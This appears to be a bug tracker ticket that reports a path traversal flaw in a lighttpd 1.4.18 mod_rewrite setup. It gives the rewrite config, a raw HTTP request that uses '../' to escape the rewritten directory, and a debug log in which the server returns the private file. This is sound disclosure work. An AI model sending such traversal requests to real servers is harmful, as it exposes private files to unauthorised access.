Opened 7 years ago

Closed 7 years ago

#130 closed defect (fixed)

mod_rewrite vulnerability

Reported by: sparrow@… Owned by: moo
Priority: critical Milestone:
Component: admin Version:
Keywords: mod_rewrite Cc:
Application: PHP Version:
Other Exts: SAPI: Others
Probability: Blocked By:
Blocking:

Description

lighttpd-1.4.18


lighttpd.conf:

$HTTP["host"] =~ "^(www\.)?(.)(.*)\.abc\.de:81$" {
    server.document-root = "/home/abc_de"

    url.rewrite-once = (
        # files
--------->        "^/files/(.*)$" => "/users/%2/%2%3/files/$1",

        # site
        "^(.*)$" => "/users/%2/%2%3/index.php/$1"
    )
}

request:

telnet test.abc.de 81

---------> GET /files/../settings/myfile.gz HTTP/1.1
Host: abc.de:81
User-Agent: Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.1.6) Gecko/20070830 Firefox/2.0.0.6
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: pl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive



log:

(response.c.205) -- splitting Request-URI

******************************************************************************************************
**** Rewrite: ^/files/(.*)$
******************************************************************************************************

(response.c.206) Request-URI  :  /files/../settings/myfile.gz
(response.c.207) URI-scheme   :  http
(response.c.208) URI-authority:  test.abc.de:81
(response.c.209) URI-path     :  /files/../settings/myfile.gz
(response.c.210) URI-query    :
(response.c.205) -- splitting Request-URI
(response.c.206) Request-URI  :  /users/t/test/files/../settings/myfile.gz
(response.c.207) URI-scheme   :  http
(response.c.208) URI-authority:  test.abc.de:81
(response.c.209) URI-path     :  /users/t/test/files/../settings/myfile.gz
(response.c.210) URI-query    :
(response.c.260) -- sanatising URI

******************************************************************************************************
**** Vulnerability **** (response.c.261) URI-path     :  /users/t/test/settings/myfile.gz
******************************************************************************************************

(mod_access.c.135) -- mod_access_uri_handler called
(response.c.375) -- before doc_root
(response.c.376) Doc-Root     : /home/abc_de
(response.c.377) Rel-Path     : /users/t/test/settings/myfile.gz
(response.c.378) Path         :
(response.c.426) -- after doc_root
(response.c.427) Doc-Root     : /home/abc_de
(response.c.428) Rel-Path     : /users/t/test/settings/myfile.gz
(response.c.429) Path         : /home/abc_de/users/t/test/settings/myfile.gz
(response.c.446) -- logical -> physical
(response.c.447) Doc-Root     : /home/abc_de
(response.c.448) Rel-Path     : /users/t/test/settings/myfile.gz
(response.c.449) Path         : /home/abc_de/users/t/test/settings/myfile.gz
(response.c.466) -- handling physical path
(response.c.467) Path         : /home/abc_de/users/t/test/settings/myfile.gz
(response.c.474) -- file found
(response.c.475) Path         : /home/abc_de/users/t/test/settings/myfile.gz
(response.c.613) -- handling subrequest
(response.c.614) Path         : /home/abc_de/users/t/test/settings/myfile.gz
(mod_access.c.135) -- mod_access_uri_handler called
(mod_staticfile.c.394) -- handling file as static file
(response.c.625) -- subrequest finished
(response.c.114) Response-Header:
HTTP/1.1 200 OK
Content-Type: application/x-gzip
Accept-Ranges: bytes
ETag: "210873236"
Last-Modified: Sun, 30 Sep 2007 02:03:03 GMT
Content-Length: 6057
Date: Sun, 30 Sep 2007 13:50:39 GMT
Server: Apache Server

Change History (1)

comment:1 Changed 7 years ago by moo

  • Resolution set to fixed
  • Status changed from new to closed

please move to http://trac.lighttpd.net/, thanks

Note: See TracTickets for help on using tickets.